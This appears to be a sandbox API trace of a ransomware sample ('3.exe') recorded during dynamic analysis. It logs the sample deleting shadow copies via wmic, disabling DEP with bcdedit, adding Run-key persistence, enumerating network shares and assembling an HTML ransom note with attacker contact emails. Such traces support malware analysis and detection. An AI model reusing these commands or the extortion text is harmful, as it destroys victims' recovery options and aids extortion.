	[0033.042] Wow64DisableWow64FsRedirection (in: OldValue=0x1adc10 | out: OldValue=0x1adc10*=0x1) returned 1
	[0033.042] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C bcdedit.exe /set {current} nx AlwaysOff", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1adbbc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1adc00 | out: lpCommandLine="/C bcdedit.exe /set {current} nx AlwaysOff", lpProcessInformation=0x1adc00*(hProcess=0x364, hThread=0x360, dwProcessId=0x9b8, dwThreadId=0x9bc)) returned 1
	[0033.048] CloseHandle (hObject=0x364) returned 1
	[0033.048] CloseHandle (hObject=0x360) returned 1
	[0033.048] Wow64DisableWow64FsRedirection (in: OldValue=0x1adc0c | out: OldValue=0x1adc0c*=0x1) returned 1
	[0033.048] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C wmic SHADOWCOPY DELETE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1adbb8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1adbfc | out: lpCommandLine="/C wmic SHADOWCOPY DELETE", lpProcessInformation=0x1adbfc*(hProcess=0x364, hThread=0x360, dwProcessId=0x9c0, dwThreadId=0x9c4)) returned 1
	[0033.053] CloseHandle (hObject=0x364) returned 1
	[0033.053] CloseHandle (hObject=0x360) returned 1
	[0033.053] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ad80c, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3.exe")) returned 0x2b
	[0033.053] GetWindowsDirectoryW (in: lpBuffer=0x1ada18, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa
	[0033.053] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\3.exe" | out: lpString1="C:\\Windows\\3.exe") returned="C:\\Windows\\3.exe"
	[0033.053] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3.exe"), lpNewFileName="C:\\Windows\\3.exe" (normalized: "c:\\windows\\3.exe"), bFailIfExists=0) returned 1
	[0033.073] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x1adc24 | out: phkResult=0x1adc24*=0x364) returned 0x0
	[0033.073] lstrlenW (lpString="C:\\Windows\\3.exe") returned 16
	[0033.073] RegSetValueExW (in: hKey=0x364, lpValueName="3.exe", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\3.exe", cbData=0x21 | out: lpData="C:\\Windows\\3.exe") returned 0x0
	[0033.074] RegCloseKey (hKey=0x364) returned 0x0
	[0033.074] GetConsoleWindow () returned 0x7011c
	[0033.074] ShowWindow (hWnd=0x7011c, nCmdShow=0) returned 1
	[0033.079] GetLogicalDriveStringsW (in: nBufferLength=0x400, lpBuffer=0x1ad80c | out: lpBuffer="C:\\") returned 0x4
	[0033.079] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0033.079] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x18) returned 0x560a98
	[0033.079] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0033.079] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0033.079] lstrlenW (lpString="C:\\") returned 3
	[0033.080] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x1adc14 | out: lphEnum=0x1adc14*=0x574f20) returned 0x0
	[0034.068] WNetEnumResourceW (in: hEnum=0x574f20, lpcCount=0x1adc18, lpBuffer=0x1a5bf8, lpBufferSize=0x1adc10 | out: lpcCount=0x1adc18, lpBuffer=0x1a5bf8, lpBufferSize=0x1adc10) returned 0x0
	[0034.069] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x1a5bf8, lphEnum=0x1a5bd4 | out: lphEnum=0x1a5bd4*=0x560af8) returned 0x0
	[0034.330] WNetEnumResourceW (in: hEnum=0x560af8, lpcCount=0x1a5bd8, lpBuffer=0x19dbb8, lpBufferSize=0x1a5bd0 | out: lpcCount=0x1a5bd8, lpBuffer=0x19dbb8, lpBufferSize=0x1a5bd0) returned 0x103
	[0034.331] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x1a5c18, lphEnum=0x1a5bd4 | out: lphEnum=0x1a5bd4*=0x7) returned 0x4b8
	[0051.767] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x1a5c38, lphEnum=0x1a5bd4 | out: lphEnum=0x1a5bd4*=0x7) returned 0x4c6
	[0051.769] WNetCloseEnum (hEnum=0x574f20) returned 0x0
	[0051.769] GetCurrentProcess () returned 0xffffffff
	[0051.769] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1
	[0051.769] GetProcessHeap () returned 0x540000
	[0051.769] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5831a0
	[0051.770] lstrcatW (in: lpString1="", lpString2="." | out: lpString1=".") returned="."
	[0051.770] lstrcatW (in: lpString1=".", lpString2="12781717671972518758" | out: lpString1=".12781717671972518758") returned=".12781717671972518758"
	[0051.770] lstrcatW (in: lpString1=".12781717671972518758", lpString2="." | out: lpString1=".12781717671972518758.") returned=".12781717671972518758."
	[0051.770] lstrcatW (in: lpString1=".12781717671972518758.", lpString2="ex_parvis@aol.com" | out: lpString1=".12781717671972518758.ex_parvis@aol.com") returned=".12781717671972518758.ex_parvis@aol.com"
	[0051.770] lstrcatW (in: lpString1=".12781717671972518758.ex_parvis@aol.com", lpString2=".AIR" | out: lpString1=".12781717671972518758.ex_parvis@aol.com.AIR") returned=".12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.770] lstrlenW (lpString=".12781717671972518758.ex_parvis@aol.com.AIR") returned 43
	[0051.770] lstrcpyW (in: lpString1=0xe4a1f8, lpString2="12781717671972518758" | out: lpString1="12781717671972518758") returned="12781717671972518758"
	[0051.770] lstrlenW (lpString="12781717671972518758") returned 20
	[0051.770] GetProcessHeap () returned 0x540000
	[0051.770] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1fa0) returned 0x59f090
	[0051.770] lstrcpyA (in: lpString1=0x59f090, lpString2="<html><head><title></title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/><style type=\"text/css\"> * {padding:0; margin:0;} a {text-decoration:none;} p {padding-left:10px;} .container {width:700px; margin-left:auto; margin-right:auto;} .header {background-color:#441111} .header h1 {color:white; line-height:80px;} .header img {float:left; height:70px; width:100px; padding:5px; margin-right:20px} .content {word-break: break-all;float:left; width:700px; text-align:center;} .footer {clear:left; background-color:#bb9955;}</style></head><body> <div class=\"container\"> <div class=\"header\"> <h1 align=\"center\">Major</h1> </div><div class=\"content\"><p><strong>I am truly sorry to inform you that all your important files are crypted.</strong></p><p>If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder</p><p>Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever</p><p>Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers</p><p>Contact me on this email address " | out: lpString1="<html><head><title></title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/><style type=\"text/css\"> * {padding:0; margin:0;} a {text-decoration:none;} p {padding-left:10px;} .container {width:700px; margin-left:auto; margin-right:auto;} .header {background-color:#441111} .header h1 {color:white; line-height:80px;} .header img {float:left; height:70px; width:100px; padding:5px; margin-right:20px} .content {word-break: break-all;float:left; width:700px; text-align:center;} .footer {clear:left; background-color:#bb9955;}</style></head><body> <div class=\"container\"> <div class=\"header\"> <h1 align=\"center\">Major</h1> </div><div class=\"content\"><p><strong>I am truly sorry to inform you that all your important files are crypted.</strong></p><p>If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder</p><p>Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever</p><p>Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers</p><p>Contact me on this email address ") returned="<html><head><title></title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/><style type=\"text/css\"> * {padding:0; margin:0;} a {text-decoration:none;} p {padding-left:10px;} .container {width:700px; margin-left:auto; margin-right:auto;} .header {background-color:#441111} .header h1 {color:white; line-height:80px;} .header img {float:left; height:70px; width:100px; padding:5px; margin-right:20px} .content {word-break: break-all;float:left; width:700px; text-align:center;} .footer {clear:left; background-color:#bb9955;}</style></head><body> <div class=\"container\"> <div class=\"header\"> <h1 align=\"center\">Major</h1> </div><div class=\"content\"><p><strong>I am truly sorry to inform you that all your important files are crypted.</strong></p><p>If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder</p><p>Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever</p><p>Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers</p><p>Contact me on this email address "
	[0051.770] lstrcatA (in: lpString1="<html><head><title></title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/><style type=\"text/css\"> * {padding:0; margin:0;} a {text-decoration:none;} p {padding-left:10px;} .container {width:700px; margin-left:auto; margin-right:auto;} .header {background-color:#441111} .header h1 {color:white; line-height:80px;} .header img {float:left; height:70px; width:100px; padding:5px; margin-right:20px} .content {word-break: break-all;float:left; width:700px; text-align:center;} .footer {clear:left; background-color:#bb9955;}</style></head><body> <div class=\"container\"> <div class=\"header\"> <h1 align=\"center\">Major</h1> </div><div class=\"content\"><p><strong>I am truly sorry to inform you that all your important files are crypted.</strong></p><p>If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder</p><p>Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever</p><p>Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers</p><p>Contact me on this email address ", lpString2="\r\n ex_parvis@aol.com \r\n ex_parvis@tutanota.com \r\n ex_parvis@protonmail.com \r\n" | out: lpString1="<html><head><title></title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/><style type=\"text/css\"> * {padding:0; margin:0;} a {text-decoration:none;} p {padding-left:10px;} .container {width:700px; margin-left:auto; margin-right:auto;} .header {background-color:#441111} .header h1 {color:white; line-height:80px;} .header img {float:left; height:70px; width:100px; padding:5px; margin-right:20px} .content {word-break: break-all;float:left; width:700px; text-align:center;} .footer {clear:left; background-color:#bb9955;}</style></head><body> <div class=\"container\"> <div class=\"header\"> <h1 align=\"center\">Major</h1> </div><div class=\"content\"><p><strong>I am truly sorry to inform you that all your important files are crypted.</strong></p><p>If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder</p><p>Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever</p><p>Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers</p><p>Contact me on this email address \r\n ex_parvis@aol.com \r\n ex_parvis@tutanota.com \r\n ex_parvis@protonmail.com \r\n") returned="<html><head><title></title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/><style type=\"text/css\"> * {padding:0; margin:0;} a {text-decoration:none;} p {padding-left:10px;} .container {width:700px; margin-left:auto; margin-right:auto;} .header {background-color:#441111} .header h1 {color:white; line-height:80px;} .header img {float:left; height:70px; width:100px; padding:5px; margin-right:20px} .content {word-break: break-all;float:left; width:700px; text-align:center;} .footer {clear:left; background-color:#bb9955;}</style></head><body> <div class=\"container\"> <div class=\"header\"> <h1 align=\"center\">Major</h1> </div><div class=\"content\"><p><strong>I am truly sorry to inform you that all your important files are crypted.</strong></p><p>If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder</p><p>Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever</p><p>Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers</p><p>Contact me on this email address \r\n ex_parvis@aol.com \r\n ex_parvis@tutanota.com \r\n ex_parvis@protonmail.com \r\n"
	[0051.770] lstrcatA (in: lpString1="<html><head><title></title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/><style type=\"text/css\"> * {padding:0; margin:0;} a {text-decoration:none;} p {padding-left:10px;} .container {width:700px; margin-left:auto; margin-right:auto;} .header {background-color:#441111} .header h1 {color:white; line-height:80px;} .header img {float:left; height:70px; width:100px; padding:5px; margin-right:20px} .content {word-break: break-all;float:left; width:700px; text-align:center;} .footer {clear:left; background-color:#bb9955;}</style></head><body> <div class=\"container\"> <div class=\"header\"> <h1 align=\"center\">Major</h1> </div><div class=\"content\"><p><strong>I am truly sorry to inform you that all your important files are crypted.</strong></p><p>If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder</p><p>Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever</p><p>Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers</p><p>Contact me on this email address \r\n ex_parvis@aol.com \r\n ex_parvis@tutanota.com \r\n ex_parvis@protonmail.com \r\n", lpString2="\"</p><p>Here is you personal id, send it to us</p><br><p><font color=\"red\">" | out: lpString1="<html><head><title></title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/><style type=\"text/css\"> * {padding:0; margin:0;} a {text-decoration:none;} p {padding-left:10px;} .container {width:700px; margin-left:auto; margin-right:auto;} .header {background-color:#441111} .header h1 {color:white; line-height:80px;} .header img {float:left; height:70px; width:100px; padding:5px; margin-right:20px} .content {word-break: break-all;float:left; width:700px; text-align:center;} .footer {clear:left; background-color:#bb9955;}</style></head><body> <div class=\"container\"> <div class=\"header\"> <h1 align=\"center\">Major</h1> </div><div class=\"content\"><p><strong>I am truly sorry to inform you that all your important files are crypted.</strong></p><p>If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder</p><p>Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever</p><p>Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers</p><p>Contact me on this email address \r\n ex_parvis@aol.com \r\n ex_parvis@tutanota.com \r\n ex_parvis@protonmail.com \r\n\"</p><p>Here is you personal id, send it to us</p><br><p><font color=\"red\">") returned="<html><head><title></title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/><style type=\"text/css\"> * {padding:0; margin:0;} a {text-decoration:none;} p {padding-left:10px;} .container {width:700px; margin-left:auto; margin-right:auto;} .header {background-color:#441111} .header h1 {color:white; line-height:80px;} .header img {float:left; height:70px; width:100px; padding:5px; margin-right:20px} .content {word-break: break-all;float:left; width:700px; text-align:center;} .footer {clear:left; background-color:#bb9955;}</style></head><body> <div class=\"container\"> <div class=\"header\"> <h1 align=\"center\">Major</h1> </div><div class=\"content\"><p><strong>I am truly sorry to inform you that all your important files are crypted.</strong></p><p>If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder</p><p>Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever</p><p>Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers</p><p>Contact me on this email address \r\n ex_parvis@aol.com \r\n ex_parvis@tutanota.com \r\n ex_parvis@protonmail.com \r\n\"</p><p>Here is you personal id, send it to us</p><br><p><font color=\"red\">"
	[0051.770] lstrlenA (lpString="<html><head><title></title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/><style type=\"text/css\"> * {padding:0; margin:0;} a {text-decoration:none;} p {padding-left:10px;} .container {width:700px; margin-left:auto; margin-right:auto;} .header {background-color:#441111} .header h1 {color:white; line-height:80px;} .header img {float:left; height:70px; width:100px; padding:5px; margin-right:20px} .content {word-break: break-all;float:left; width:700px; text-align:center;} .footer {clear:left; background-color:#bb9955;}</style></head><body> <div class=\"container\"> <div class=\"header\"> <h1 align=\"center\">Major</h1> </div><div class=\"content\"><p><strong>I am truly sorry to inform you that all your important files are crypted.</strong></p><p>If you want to recover your encrypted files you need to follow a few steps. Do not try to decrypt your files with programs by the decoder</p><p>Do not try to decrypt your files with programs by the decoder you will only damage your data and lose them forever</p><p>Only we can decrypt your data, write to the original mails specified in this file, otherwise you will become a victim of scammers</p><p>Contact me on this email address \r\n ex_parvis@aol.com \r\n ex_parvis@tutanota.com \r\n ex_parvis@protonmail.com \r\n\"</p><p>Here is you personal id, send it to us</p><br><p><font color=\"red\">") returned 1352
	[0051.770] lstrlenA (lpString="\"</p><p>Here is you personal id, send it to us</p><br><p><font color=\"red\">") returned 75
	[0051.770] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596490
	[0051.770] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x330) returned 0x5a16b8
	[0051.770] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5964c0
	[0051.770] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x28) returned 0x567e68
	[0051.770] RtlInitializeConditionVariable () returned 0x567e6c
	[0051.770] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x30) returned 0x583918
	[0051.771] RtlInitializeConditionVariable () returned 0x583920
	[0051.771] GetCurrentThreadId () returned 0x95c
	[0051.771] GetCurrentThreadId () returned 0x95c
	[0051.771] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x14) returned 0x598170
	[0051.771] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0xdf5720, phModule=0x59817c | out: phModule=0x59817c*=0xdf0000) returned 1
	[0051.771] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xe08f0c, lpParameter=0x598170, dwCreationFlags=0x0, lpThreadId=0x1adbb4 | out: lpThreadId=0x1adbb4*=0x738) returned 0x3b4
	[0051.772] SleepConditionVariableSRW (in: ConditionVariable=0x567e6c, SRWLock=0x583920, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x567e6c, SRWLock=0x583920) returned 1
	[0051.780] GetCurrentThreadId () returned 0x95c
	[0051.780] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0051.780] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x567e68 | out: hHeap=0x540000) returned 1
	[0051.781] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596550
	[0051.781] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596490 | out: hHeap=0x540000) returned 1
	[0051.781] GetCurrentThreadId () returned 0x95c
	[0051.781] WaitForSingleObjectEx (hHandle=0x3b4, dwMilliseconds=0xffffffff, bAlertable=0) 

Thread:
	id = 2
	os_tid = 0x970


Thread:
	id = 3
	os_tid = 0x974


Thread:
	id = 4
	os_tid = 0x978


Thread:
	id = 5
	os_tid = 0x97c


Thread:
	id = 6
	os_tid = 0x980


Thread:
	id = 7
	os_tid = 0x984


Thread:
	id = 21
	os_tid = 0x990


Thread:
	id = 22
	os_tid = 0x994


Thread:
	id = 132
	os_tid = 0xb00


Thread:
	id = 157
	os_tid = 0x738

	[0051.773] GetLastError () returned 0x0
	[0051.774] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x364) returned 0x5a1c00
	[0051.774] SetLastError (dwErrCode=0x0) 
	[0051.774] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0051.774] GetLastError () returned 0x57
	[0051.774] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0051.775] LoadLibraryExW (lpLibFileName="ext-ms-win-kernel32-package-current-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x0
	[0051.775] GetLastError () returned 0x57
	[0051.775] LoadLibraryExW (lpLibFileName="ext-ms-win-kernel32-package-current-l1-1-0", hFile=0x0, dwFlags=0x0) returned 0x0
	[0051.775] GetCurrentThreadId () returned 0x738
	[0051.775] GetCurrentThreadId () returned 0x738
	[0051.775] RtlWakeConditionVariable () returned 0x1
	[0051.775] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5964e0
	[0051.775] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596cd8
	[0051.775] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2) returned 0x5964f0
	[0051.776] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5964f0 | out: hHeap=0x540000) returned 1
	[0051.776] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2) returned 0x5964f0
	[0051.776] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x44) returned 0x593950
	[0051.776] GetLastError () returned 0x7e
	[0051.776] SetLastError (dwErrCode=0x7e) 
	[0051.776] GetLastError () returned 0x7e
	[0051.776] SetLastError (dwErrCode=0x7e) 
	[0051.776] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xb8) returned 0x5a1f88
	[0051.776] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x6a6) returned 0x5a3f70
	[0051.776] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a3f70 | out: hHeap=0x540000) returned 1
	[0051.776] GetLastError () returned 0x7e
	[0051.776] SetLastError (dwErrCode=0x7e) 
	[0051.776] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x6) returned 0x596500
	[0051.776] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2) returned 0x596510
	[0051.776] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x4) returned 0x596520
	[0051.776] GetLastError () returned 0x7e
	[0051.776] SetLastError (dwErrCode=0x7e) 
	[0051.776] GetLastError () returned 0x7e
	[0051.776] SetLastError (dwErrCode=0x7e) 
	[0051.776] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xb8) returned 0x5a2048
	[0051.777] GetLastError () returned 0x7e
	[0051.777] SetLastError (dwErrCode=0x7e) 
	[0051.777] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x6a6) returned 0x5a3f70
	[0051.777] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a3f70 | out: hHeap=0x540000) returned 1
	[0051.777] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596500 | out: hHeap=0x540000) returned 1
	[0051.777] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1f88 | out: hHeap=0x540000) returned 1
	[0051.777] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596520 | out: hHeap=0x540000) returned 1
	[0051.777] GetLastError () returned 0x7e
	[0051.777] SetLastError (dwErrCode=0x7e) 
	[0051.777] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x6) returned 0x596520
	[0051.777] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2) returned 0x596500
	[0051.777] GetLastError () returned 0x7e
	[0051.777] SetLastError (dwErrCode=0x7e) 
	[0051.777] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x200) returned 0x5a3f70
	[0051.777] GetLastError () returned 0x7e
	[0051.777] SetLastError (dwErrCode=0x7e) 
	[0051.777] GetLastError () returned 0x7e
	[0051.777] SetLastError (dwErrCode=0x7e) 
	[0051.777] GetLastError () returned 0x7e
	[0051.777] SetLastError (dwErrCode=0x7e) 
	[0051.777] GetLastError () returned 0x7e
	[0051.777] SetLastError (dwErrCode=0x7e) 
	[0051.777] GetLastError () returned 0x7e
	[0051.777] SetLastError (dwErrCode=0x7e) 
	[0051.777] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x4) returned 0x596530
	[0051.777] GetLastError () returned 0x7e
	[0051.777] SetLastError (dwErrCode=0x7e) 
	[0051.777] GetLastError () returned 0x7e
	[0051.777] SetLastError (dwErrCode=0x7e) 
	[0051.778] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xb8) returned 0x5a1f88
	[0051.778] GetLastError () returned 0x7e
	[0051.778] SetLastError (dwErrCode=0x7e) 
	[0051.778] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x6a6) returned 0x5a4178
	[0051.778] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a4178 | out: hHeap=0x540000) returned 1
	[0051.778] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596520 | out: hHeap=0x540000) returned 1
	[0051.778] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a2048 | out: hHeap=0x540000) returned 1
	[0051.778] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596530 | out: hHeap=0x540000) returned 1
	[0051.778] GetLastError () returned 0x7e
	[0051.778] SetLastError (dwErrCode=0x7e) 
	[0051.778] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x6) returned 0x596530
	[0051.778] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596500 | out: hHeap=0x540000) returned 1
	[0051.778] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596510 | out: hHeap=0x540000) returned 1
	[0051.778] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596510
	[0051.778] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596500
	[0051.778] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596d00
	[0051.778] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596c10
	[0051.778] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596d50
	[0051.778] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596d50 | out: hHeap=0x540000) returned 1
	[0051.778] FindFirstFileW (in: lpFileName="C:\\\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x574f20
	[0051.779] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.779] GetLastError () returned 0x7e
	[0051.779] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252
	[0051.779] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x28) returned 0x567e98
	[0051.779] SetLastError (dwErrCode=0x7e) 
	[0051.779] GetLastError () returned 0x7e
	[0051.779] SetLastError (dwErrCode=0x7e) 
	[0051.779] GetLastError () returned 0x7e
	[0051.779] SetLastError (dwErrCode=0x7e) 
	[0051.779] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596d50
	[0051.779] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596d78
	[0051.779] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596d50 | out: hHeap=0x540000) returned 1
	[0051.779] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596d78 | out: hHeap=0x540000) returned 1
	[0051.779] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0051.779] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x596d78
	[0051.779] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583988
	[0051.779] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596520
	[0051.780] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596540
	[0051.780] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.780] GetLastError () returned 0x7e
	[0051.780] SetLastError (dwErrCode=0x7e) 
